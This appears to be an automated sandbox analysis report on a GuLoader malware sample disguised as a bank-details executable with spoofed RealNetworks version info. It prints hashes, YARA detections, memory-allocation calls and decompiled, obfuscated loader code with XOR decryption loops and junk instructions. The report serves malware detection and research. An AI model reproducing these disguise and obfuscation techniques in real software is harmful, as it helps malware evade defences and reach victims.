__vbaStrI2, _CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, __vbaVarLateMemSt, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	RealNetworks, Inc.
InternalName	figurmrk
FileVersion	66.00
CompanyName	RealNetworks, Inc.
LegalTrademarks	RealNetworks, Inc.
Comments	RealNetworks, Inc.
ProductName	RealNetworks, Inc.
ProductVersion	66.00
FileDescription	RealNetworks, Inc.
OriginalFilename	figurmrk.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: Foreign_Bank Account Details.exe PID: 3240 Parent PID: 6036

General

Start time:	09:28:21
Start date:	12/10/2021
Path:	C:\Users\user\Desktop\Foreign_Bank Account Details.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Foreign_Bank Account Details.exe'
Imagebase:	0x400000
File size:	135168 bytes
MD5 hash:	8906FA5FED7B1D3D2E5579D97419C076
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Foreign_Bank Account Details.exe PID: 3240 Parent PID: 6036 Foreign_Bank Account Details.exeCOMMON

Executed Functions

Function 004012D8, Relevance: 9.5, APIs: 2, Strings: 2, Instructions: 2548
COMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			_entry_(signed int __eax, void* __ebx, void* __ecx, signed int __edx, intOrPtr* __edi, signed int __esi, void* __fp0) {
				signed int _t208;
				intOrPtr* _t210;
				signed int _t211;
				signed char _t214;
				signed char _t215;
				void* _t216;
				signed int _t217;
				signed char _t269;
				signed char _t272;
				signed int _t274;
				signed char _t275;
				signed char _t278;
				intOrPtr* _t280;
				intOrPtr* _t286;
				intOrPtr* _t287;
				void* _t289;
				void* _t295;
				intOrPtr* _t914;
				signed int* _t915;
				signed int* _t917;
				signed int* _t923;
				void* _t960;
				signed int* _t965;
				signed int _t966;
				signed char _t967;
				void* _t995;
				intOrPtr* _t996;
				signed int _t997;
				intOrPtr* _t1024;
				signed int _t1027;
				void* _t1041;
				void* _t1042;
				signed int _t1045;
				signed int _t1047;
				void* _t1049;
				void* _t1067;
				void* _t1069;
				void* _t1070;
				void* _t1073;
				void* _t1084;

				_t996 = __edi;
				_t966 = __edx;
				_t208 = __eax;
				_push("VB5!6&*"); // executed
				L004012D2(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__esi =  *__esi & __edx;
				 *(__edi - 0x47) =  *(__edi - 0x47) ^ __esi;
				_t914 = __ecx + 1;
				es =  *((intOrPtr*)(__edi - 0x6f));
				asm("cld");
				_t1084 =  *__edi - __ebx;
				if(_t1084 > 0) {
					asm("int1");
					if (_t1084 != 0) goto L2;
					 *__eax =  *__eax + __eax;
					 *__eax =  *__eax + __eax;
					 *_t914 =  *_t914 + __eax;
					 *__eax =  *__eax + __eax;
					 *__eax =  *__eax + __eax;
				}
				 *_t208 =  *_t208 + _t208;
				 *_t208 =  *_t208 + _t208;
				 *((intOrPtr*)(_t1042 + 0x6d)) =  *((intOrPtr*)(_t1042 + 0x6d)) + _t208;
				asm("bound ebp, [ecx+0x69]");
				 *[fs:eax] =  *[fs:eax] + _t208;
				 *_t208 =  *_t208 + _t208;
				 *_t208 =  *_t208 + _t208;
				 *_t208 =  *_t208 ^ _t208;
				_pop(_t1024);
				_t1069 = _t1067 - 1 + 1;
				asm("insb");
				asm("in al, dx");
				asm("int1");
				_push(es);
				asm("scasd");
				asm("outsd");
				asm("rcr byte [esp+ebp*2-0x28], cl");
				_push(_t1024);
				_t915 = _t914 + 1;
				_t210 = _t208 - 1;
				asm("stosb");
				 *((intOrPtr*)(_t210 - 0x2d)) =  *((intOrPtr*)(_t210 - 0x2d)) + _t210;
				_t211 = 0x00000077 ^  *(_t915 - 0x48ee309a);
				_t286 = _t210;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t211 =  *_t211 + _t211;
				 *0xfc =  *0xfc + 0xfc;
				_t1045 = 1 + _t966 * 0x44f5abab;
				 *0xfc =  *0xfc + 0xfc;
				 *0xfc =  *0xfc + 0xfc;
				_t213 = 0x706e55fc;
				if(0x706e55fc < 0) {
					L7:
					_t1069 = _t1069 +  *_t1024;
					 *_t213 =  *_t213 + _t213;
					 *_t286 =  *_t286 + _t213;
					_push(es);
					 *((intOrPtr*)(_t286 + 0x4f)) =  *((intOrPtr*)(_t286 + 0x4f)) + _t915;
					goto L8;
				} else {
					 *0x50000901 =  *0x50000901 + _t915;
					_push(_t966);
					_t965 =  &(_t915[0]);
					 *_t965 =  *_t965 + 0x77;
					 *((intOrPtr*)(0x706e55fc)) =  *((intOrPtr*)(0x706e55fc)) + 0x706e55fc;
					_t966 = _t966 + 1;
					 *_t966 =  *_t966 + 0x706e55fc;
					 *((intOrPtr*)(_t965 + _t965)) =  *((intOrPtr*)(_t965 + _t965)) + 0x706e55fc;
					 *0x706E564E =  *((intOrPtr*)(0x706e564e)) + _t966;
					_t915 =  &(_t965[0]);
					_t286 = _t286 + 4;
					_t996 = _t996;
					_t1045 = _t1045 + 1 + 1;
					 *0x1831 =  *0x1831 + _t966;
					 *((intOrPtr*)(0x706e55fc)) =  *((intOrPtr*)(0x706e55fc)) + _t966;
					 *((intOrPtr*)(0x706e55fc)) =  *((intOrPtr*)(0x706e55fc)) + 0xfc;
					asm("rcl dword [edx], cl");
					 *((intOrPtr*)(0x706e55fc)) =  *((intOrPtr*)(0x706e55fc)) + 0xfc;
					_t213 = 0x40000018;
					 *((intOrPtr*)(_t1024 + 3)) =  *((intOrPtr*)(_t1024 + 3)) + 0xfc;
					 *_t915 =  *_t915 + 1;
					asm("sbb al, [eax]");
					 *0x40000018 =  *0x40000018 + 0xfc;
					 *_t1024 =  *_t1024 + 0x40000018;
					_t18 = _t915 + 0x6d + _t1045 * 2;
					 *_t18 =  *((intOrPtr*)(_t915 + 0x6d + _t1045 * 2)) + _t966;
					if( *_t18 < 0) {
						L8:
						_t997 = _t996 - 1;
						_t1024 = _t1024 - 1;
						_t1069 = _t1069 + 1;
						_t1047 = _t1045 + 1 - 1;
						 *((intOrPtr*)(_t915 + _t213)) =  *((intOrPtr*)(_t915 + _t213)) + _t213;
						_push(es);
						 *((intOrPtr*)(_t286 + 0x76)) =  *((intOrPtr*)(_t286 + 0x76)) + _t966;
						asm("popad");
						asm("outsb");
						_t214 =  *0xfb04c205;
						es = 0xac80400;
						asm("adc [eax], eax");
						L9:
						_t287 = _t286 + _t286;
						_t1070 = _t1069 +  *0x4000000;
						_t215 = _t214 + 0x756f4300;
						if(_t215 <= 0) {
							L12:
							_push(_t215);
							_push(_t966);
							_t997 = _t997 - 1;
							 *((intOrPtr*)(_t287 + _t1047 * 8)) =  *((intOrPtr*)(_t287 + _t1047 * 8)) + _t215;
							 *((intOrPtr*)(_t1070 + _t215 + 0x22b0138)) =  *((intOrPtr*)(_t1070 + _t215 + 0x22b0138)) + _t915;
							asm("adc [edx], eax");
							_t287 = _t287 + _t287;
							_t1070 = _t1070 +  *0x6000000;
							_push(es);
							_t46 = _t997 + 0x65;
							 *_t46 =  *((intOrPtr*)(_t997 + 0x65)) + _t215;
							asm("outsb");
							if( *_t46 >= 0) {
								L16:
								_push(_t215);
								_t216 = _t215 - 1;
								 *((intOrPtr*)(_t915 + _t216)) =  *((intOrPtr*)(_t915 + _t216)) + _t216;
								_push(es);
								 *((intOrPtr*)(_t1047 + 0x69)) =  *((intOrPtr*)(_t1047 + 0x69)) + _t915;
								asm("insb");
								asm("insb");
								_t217 = _t216 + 0x62d07b2;
								asm("adc [esi], eax");
								_t1047 =  *_t1047 * 0xcf027304 +  *_t966;
								 *_t217 =  *_t217 + _t217;
								 *_t966 =  *_t966 + _t915;
								 *_t217 =  *_t217 | _t217;
								_t967 = _t966 + 1;
								_push(_t967);
								_t917 =  &(_t915[0]) - 1;
								_t289 = _t287 + _t287 - 1;
								_push(_t289);
								_t1027 = _t1024 - 1 + 2;
								_push(_t967);
								 *_t1027 =  *_t1027 + _t217;
								 *_t997 =  *_t997 + _t217;
								_t65 = _t289 + 0x74;
								 *_t65 =  *((intOrPtr*)(_t289 + 0x74)) + _t967;
								asm("outsd");
								if( *_t65 <= 0) {
									L19:
									asm("popad");
								}
								_t1027 =  *_t997 * 0;
								_t272 = _t217 + 0x1de0710;
								_pop(es);
								 *_t967 =  *_t967 | _t272;
								asm("adc al, [edi]");
								_t287 = _t289 + _t289;
								_t1070 = _t1070 +  *0xb000000;
								L18:
								 *_t287 =  *_t287 + _t917;
								_push(es);
								 *((intOrPtr*)(_t272 + 0x6f)) =  *((intOrPtr*)(_t272 + 0x6f)) + _t917;
								asm("insd");
								asm("outsd");
								asm("outsb");
								 *[gs:ecx+eax] =  *[gs:ecx+eax] + _t272;
								_t274 = _t272 + 0x454c4600 - 1;
								 *((intOrPtr*)(_t1027 + _t1047)) =  *((intOrPtr*)(_t1027 + _t1047)) + _t274;
								_t967 = _t967 +  *0x2d07d308;
								 *_t917 =  *_t917 | _t967;
								 *_t274 =  *_t274 | _t274;
								 *_t287 =  *_t287 + 1;
								_t275 = _t274 &  *_t274;
								 *_t275 =  *_t275 + _t275;
								_t269 = _t275 | 0x00000004;
								 *((intOrPtr*)(_t1047 + 0x56)) =  *((intOrPtr*)(_t1047 + 0x56)) + _t917;
								_push(_t967);
								_t1049 = _t1047 + 1;
								 *_t1027 =  *_t1027 + _t269;
								 *0x50525000 =  *0x50525000 + _t269;
								_t923 =  &(_t917[0]);
								_push(_t967);
								 *0x16601d9 =  *0x16601d9 + _t269;
								asm("rol byte [eax+ebp*8], cl");
								_push(es);
								asm("adc cl, [ecx]");
								_t295 = _t287 + _t287;
								_t1073 = _t1070 + 1 +  *_t997;
								 *_t269 =  *_t269 + _t269;
								 *0x61460005 =  *0x61460005 + _t923;
								if ( *0x61460005 == 0) goto L25;
								goto L19;
							}
							asm("popad");
							 *_t1024 =  *_t1024 + _t215;
							 *0x70704100 =  *0x70704100 + _t215;
							_t997 = _t997 + _t966;
							_t278 = (_t215 ^  *[gs:eax]) + 0x1ce0686;
							 *_t278 =  *_t278 + _t278;
							 *_t997 =  *_t997 + _t278;
							es = ss;
							 *((intOrPtr*)(_t966 + 0x4c)) =  *((intOrPtr*)(_t966 + 0x4c)) + _t278;
							_t960 = _t915 - 1;
							_t1070 = _t1070 + 1;
							_push(_t287);
							 *((intOrPtr*)(_t960 + _t278)) =  *((intOrPtr*)(_t960 + _t278)) + _t278;
							 *_t278 =  *_t278 | _t278;
							_push(_t278);
							_push(_t278);
							_t1041 = _t1024 - 1 + 1;
							_t995 = _t966 + 1;
							_push(_t995);
							_t917 = _t960 + 2 - 1;
							_t917[_t997] = _t917[_t997] + _t278;
							_t967 = _t995 +  *((intOrPtr*)(_t1041 + 1));
							asm("insb");
							_t1047 = _t1047 +  *_t915 - 1 +  *((intOrPtr*)(_t1070 + _t278));
							asm("adc [eax+eax], eax");
							L14:
							_t272 = _t278;
							 *_t287 =  *_t287 + 1;
							 *[es:eax] =  *[es:eax] + _t272;
							 *_t272 = _t917 +  *_t272;
							 *_t272 =  *_t272 | _t272;
							_t1027 = _t1041 - 1;
							asm("outsd");
							asm("outsb");
							if(_t1027 < 0) {
								goto L18;
							}
							_t1047 =  *(_t1027 + 0x74) * 0x4010600;
							 *((intOrPtr*)(_t287 + 0x68)) =  *((intOrPtr*)(_t287 + 0x68)) + _t967;
							asm("gs insb");
							 *0x2560263 =  *0x2560263 + _t272;
							asm("stc");
							_t280 = _t272 + 0x2503ff12;
							 *_t280 =  *_t280 + _t280;
							 *_t917 = _t917 +  *_t917;
							_t215 = _t280 + 0x50414400;
							goto L16;
						}
						 *_t1024 =  *_t1024 + _t215;
						 *_t1024 =  *_t1024 + _t215;
						 *((intOrPtr*)(_t1047 + 0x52)) =  *((intOrPtr*)(_t1047 + 0x52)) + _t966;
						_t967 = _t966 + 1;
						_t1041 = _t1024 - 1;
						_t917 =  &(_t915[0]) - 1;
						 *0x1330697 =  *0x1330697 + _t215;
						asm("rol byte [ecx], 0xf8");
						 *_t967 =  *_t967 + _t967;
						 *_t215 =  *_t215 + _t215;
						 *_t287 =  *_t287 + 1;
						 *_t215 =  *_t215 - _t215;
						 *_t215 =  *_t215 + _t215;
						_t278 = _t215 + 0x72660007;
						asm("gs insd");
						if(_t278 == 0) {
							goto L14;
						}
						 *[fs:ecx+eax] =  *[fs:ecx+eax] + _t278;
						 *_t278 =  *_t278 | _t278;
						_t966 = _t967 + 1;
						_t915 =  &(_t917[0]);
						_t1070 = _t1070 + 1;
						_t1047 = _t1047 + 1;
						goto L12;
					}
					 *_t286 =  *_t286 + _t915;
					_pop(es);
					_push(0x40000018);
					_t214 = 0x40000018 |  *0x40000018;
					 *_t214 = _t915 +  *_t214;
					_push(0xff000010);
					_t286 = _t286 +  *_t966;
					 *_t214 =  *_t214 + 0xfc;
					 *_t966 =  *_t966 + 0xfc;
					_push(es);
					_t24 = _t915 + 0x6d + _t1045 * 2;
					 *_t24 =  *((intOrPtr*)(_t915 + 0x6d + _t1045 * 2)) + _t966;
					if( *_t24 < 0) {
						goto L9;
					}
					 *_t286 =  *_t286 + _t915;
					_pop(es);
					_push(_t214);
					_t213 = _t214 |  *_t214;
					 *_t213 =  *_t213 + _t915;
					_push(0xff000010);
					goto L7;
				}
			}

0x004012d8
0x004012d8
0x004012d8
0x004012d8
0x004012dd
0x004012e2
0x004012e4
0x004012e6
0x004012e8
0x004012ea
0x004012ee
0x004012f0
0x004012f2
0x004012f4
0x004012f6
0x004012f9
0x004012fa
0x004012fd
0x004012fe
0x00401300
0x00401302
0x00401303
0x00401305
0x00401307
0x00401309
0x0040130b
0x0040130d
0x0040130d
0x0040130f
0x00401311
0x00401313
0x00401316
0x00401319
0x0040131c
0x0040131e
0x00401322
0x0040132a
0x0040132c
0x0040132f
0x00401330
0x00401331
0x00401332
0x00401333
0x00401334
0x00401335
0x00401339
0x0040133c
0x0040134e
0x00401350
0x00401351
0x00401354
0x00401354
0x00401355
0x00401357
0x00401359
0x0040135b
0x0040135d
0x0040135f
0x00401361
0x00401363
0x00401365
0x00401367
0x00401369
0x0040136b
0x0040136d
0x0040136f
0x00401371
0x00401373
0x00401375
0x00401377
0x0040137b
0x0040137d
0x0040137e
0x00401380
0x00401382
0x00401387
0x004013f8
0x004013f8
0x004013fa
0x004013fc
0x004013fe
0x004013ff
0x00000000
0x00401389
0x00401389
0x0040138f
0x00401391
0x00401397
0x00401399
0x0040139b
0x0040139c
0x0040139e
0x004013a1
0x004013a5
0x004013a7
0x004013a8
0x004013aa
0x004013ab
0x004013b1
0x004013b3
0x004013b5
0x004013b7
0x004013b9
0x004013be
0x004013c1
0x004013c3
0x004013c5
0x004013c7
0x004013c9
0x004013c9
0x004013cd
0x00401401
0x00401401
0x00401402
0x00401403
0x00401405
0x00401406
0x00401409
0x0040140a
0x0040140d
0x0040140e
0x00401415
0x0040141a
0x0040141b
0x0040141d
0x0040141d
0x0040141f
0x00401425
0x0040142a
0x0040145e
0x0040145e
0x0040145f
0x00401460
0x00401461
0x00401464
0x0040146b
0x0040146d
0x0040146f
0x00401475
0x00401476
0x00401476
0x00401479
0x0040147a
0x004014f0
0x004014f0
0x004014f1
0x004014f3
0x004014f6
0x004014f7
0x004014fa
0x004014fb
0x00401503
0x00401508
0x0040150c
0x0040150e
0x00401510
0x00401512
0x00401516
0x00401517
0x00401518
0x00401519
0x0040151a
0x0040151b
0x0040151c
0x0040151d
0x0040151f
0x00401521
0x00401521
0x00401524
0x00401525
0x0040158c
0x0040158c
0x0040158c
0x00401527
0x0040152a
0x00401530
0x00401531
0x00401533
0x00401535
0x00401537
0x0040153b
0x0040153b
0x0040153d
0x0040153e
0x00401541
0x00401542
0x00401543
0x00401544
0x0040154e
0x0040154f
0x00401552
0x00401558
0x0040155a
0x0040155c
0x0040155e
0x00401560
0x00401562
0x00401564
0x00401567
0x00401568
0x00401569
0x0040156b
0x00401571
0x00401572
0x00401573
0x00401579
0x0040157c
0x0040157d
0x0040157f
0x00401581
0x00401583
0x00401585
0x0040158b
0x00000000
0x0040158b
0x0040147c
0x0040147d
0x0040147f
0x0040148e
0x00401490
0x00401497
0x00401499
0x0040149b
0x0040149c
0x0040149f
0x004014a1
0x004014a2
0x004014a4
0x004014a7
0x004014a9
0x004014ab
0x004014ac
0x004014ae
0x004014af
0x004014b0
0x004014b1
0x004014b4
0x004014b7
0x004014b8
0x004014bb
0x004014bc
0x004014bc
0x004014be
0x004014c0
0x004014c3
0x004014c5
0x004014c7
0x004014c8
0x004014c9
0x004014ca
0x00000000
0x00000000
0x004014cc
0x004014d3
0x004014d6
0x004014d8
0x004014e0
0x004014e3
0x004014e8
0x004014ea
0x004014ec
0x00000000
0x004014ec
0x0040142c
0x0040142e
0x00401430
0x00401433
0x00401435
0x00401436
0x00401437
0x0040143d
0x00401440
0x00401442
0x00401444
0x00401446
0x00401448
0x0040144a
0x0040144f
0x00401451
0x00000000
0x00000000
0x00401453
0x00401457
0x00401459
0x0040145b
0x0040145c
0x0040145d
0x00000000
0x0040145d
0x004013d0
0x004013d2
0x004013d3
0x004013d4
0x004013d6
0x004013d8
0x004013dd
0x004013df
0x004013e1
0x004013e3
0x004013e4
0x004013e4
0x004013e8
0x00000000
0x00000000
0x004013eb
0x004013ed
0x004013ee
0x004013ef
0x004013f1
0x004013f3
0x00000000
0x004013f3

APIs

#100.MSVBVM60(VB5!6&*), ref: 004012DD

Strings

"i(, xrefs: 00402719
VB5!6&*, xrefs: 004012D8

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: "i($VB5!6&*
API String ID: 1341478452-2546581440
Opcode ID: fa59e3dea49dca9235cf84a1296520a430b3288078abac2663b4fb9b6ceace5b
Instruction ID: cb9e89fa8f7de82dab61d826ba34fdc477202e13199a01318f2adbaf56912d9d
Opcode Fuzzy Hash: fa59e3dea49dca9235cf84a1296520a430b3288078abac2663b4fb9b6ceace5b
Instruction Fuzzy Hash: 8FF29E2178F3C06BCB0746B48C609E17FB29F5B21832D69FEE4E6DA273D51B49068B15

Uniqueness

Uniqueness Score: -1.00%

Function 020C80C2, Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 949COMMON

Download Yara Rule

Strings

-3Z, xrefs: 020C81A6
lq-q, xrefs: 020C64B6

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -3Z$lq-q
API String ID: 0-427599353
Opcode ID: 2db8a8f54f259e08a163194ab59b4ada03199e5800ed6dbed7958da8b55711cc
Instruction ID: e6b8caeb9022ee6f2bd0012f9877334130f76049cb0eb8cd5a93c590cd20b3a5
Opcode Fuzzy Hash: 2db8a8f54f259e08a163194ab59b4ada03199e5800ed6dbed7958da8b55711cc
Instruction Fuzzy Hash: 6D8230B160038A9FDB719F38CD957DE7BA2BF59350F65812EDC899B214D3308A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020C80F9, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,000000F8,-8E9EAA00), ref: 020C8391

Strings

-3Z, xrefs: 020C81A6
lq-q, xrefs: 020C64B6

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: -3Z$lq-q
API String ID: 2167126740-427599353
Opcode ID: 9ca15fe2e3992b92437498c876662497137b8ac16d2956a7271c55f9e24705b9
Instruction ID: d757990d0f7e96ab41c81caada50bdca8c0fb2c83f1da285e0b64ec6a82f2aa3
Opcode Fuzzy Hash: 9ca15fe2e3992b92437498c876662497137b8ac16d2956a7271c55f9e24705b9
Instruction Fuzzy Hash: AD5115B5644349DFDB319F60DD907DEBAE6AF96394F25802DCC8987220D3308A819B01

Uniqueness

Uniqueness Score: -1.00%

Function 020C8154, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,000000F8,-8E9EAA00), ref: 020C8391

Strings

-3Z, xrefs: 020C81A6
f9, xrefs: 020C8184

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: f9$-3Z
API String ID: 2167126740-4143414501
Opcode ID: e7c443c08d1155eae3688d3bb8c11d448d4602639983f10e31f9e82f2687f9c0
Instruction ID: fb7ed04c149194864d308f858560dc201a96507de5309a52588c981b1e6fea68
Opcode Fuzzy Hash: e7c443c08d1155eae3688d3bb8c11d448d4602639983f10e31f9e82f2687f9c0
Instruction Fuzzy Hash: 4A5125B1544388DFDB229F64CD543DEBBA6AF9A394F29412ECC895B351D3318942EB40

Uniqueness

Uniqueness Score: -1.00%

Function 004022E9, Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 433
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E004022E9(void* __ebx, signed int* __ecx, void* __fp0) {
				signed int* _t54;
				void* _t84;
				void* _t86;

				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				 *__ecx =  *__ecx ^ 0x3131316e;
				asm("fnop");
				asm("fnop");
				asm("fnop");
				asm("fnop");
				asm("fnop");
				asm("fnop");
				asm("pmullw mm5, mm1");
				asm("fdivr st7, st0");
				asm("psrad xmm4, xmm3");
				asm("fclex");
				asm("fld1");
				asm("fabs");
				asm("fucom st1");
				asm("fnop");
				asm("fnop");
				0;
				asm("fnop");
				asm("fnop");
				asm("fnop");
				asm("psubw xmm1, xmm5");
				asm("f2xm1");
				asm("psrlq xmm0, 0xde");
				asm("por mm4, mm6");
				asm("psrld mm7, 0x1c");
				asm("wait");
				asm("punpcklbw xmm5, xmm1");
				asm("fnop");
				_t54 = __ecx;
				asm("fnop");
				_t86 = _t84;
				goto L4;
			}

0x004022ee
0x004022f0
0x004022f2
0x004022f4
0x004022f6
0x004022f8
0x004022fa
0x004022fc
0x004022fe
0x00402300
0x00402302
0x00402304
0x00402306
0x00402308
0x0040230a
0x0040230c
0x0040230e
0x00402310
0x00402312
0x00402314
0x00402316
0x00402318
0x0040231a
0x0040231c
0x0040231e
0x00402320
0x00402322
0x00402324
0x00402329
0x00402334
0x00402344
0x00402348
0x0040234c
0x0040235d
0x00402360
0x00402362
0x00402366
0x00402368
0x0040236a
0x0040236e
0x004023ba
0x004023bc
0x004023ce
0x004023d6
0x004023d8
0x004023e0
0x004023e2
0x004023e6
0x004023e8
0x004023ed
0x004023f0
0x004023f4
0x004023f5
0x00402437
0x0040244f
0x00402455
0x00402463
0x00402467

APIs

VirtualAlloc.KERNELBASE(00000000,00011000,-2D564770,-01FB8249), ref: 00402703

Strings

n111, xrefs: 004022E9
"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: "i($n111
API String ID: 4275171209-1983034868
Opcode ID: 5ac7775b301da8934da7f3d717edffbdccc634a8c3d153f0da91c16e7d995832
Instruction ID: 6e34493622752af9160dbde80f619cc4397cd85c2d18526fb204b65e49fc4a5f
Opcode Fuzzy Hash: 5ac7775b301da8934da7f3d717edffbdccc634a8c3d153f0da91c16e7d995832
Instruction Fuzzy Hash: 21918B66B197000B875A98BE55D4867D4C39FEF25023AF63E612DF33A9EDB9CC0B1148

Uniqueness

Uniqueness Score: -1.00%

Function 0040191F, Relevance: 4.8, APIs: 1, Strings: 1, Instructions: 1776COMMON

Download Yara Rule

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: "i(
API String ID: 0-1157772168
Opcode ID: 5146b8de784b1abe0d33cde4293a59f0c0052f079cacc9a83deeeba5b1cfa42e
Instruction ID: 8aa97e788368c8a92a79f216626a036261b9accf1b6e1ca13a2d08458efc62c7
Opcode Fuzzy Hash: 5146b8de784b1abe0d33cde4293a59f0c0052f079cacc9a83deeeba5b1cfa42e
Instruction Fuzzy Hash: EBA2E21179F3C027CB0746B989A08E17FA35F9F21833D79FDB1EADA276D56788058A04

Uniqueness

Uniqueness Score: -1.00%

Function 020CBFDE, Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1233COMMON

Download Yara Rule

Strings

lq-q, xrefs: 020C64B6

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: lq-q
API String ID: 0-45059717
Opcode ID: 3e196366e9ee850f3aeda15e4c8be6bb08b163c094fc71d336aff6f86154197d
Instruction ID: 13ca2f92d956e57cb76a2d39c7511d7d51123a5618ad2637f417e2980447dfcd
Opcode Fuzzy Hash: 3e196366e9ee850f3aeda15e4c8be6bb08b163c094fc71d336aff6f86154197d
Instruction Fuzzy Hash: 1DA24FB160038A9FDB759F38CD957DE7BA2BF95350F61812EDC899B214D3308A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020C819A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,000000F8,-8E9EAA00), ref: 020C8391

Strings

-3Z, xrefs: 020C81A6

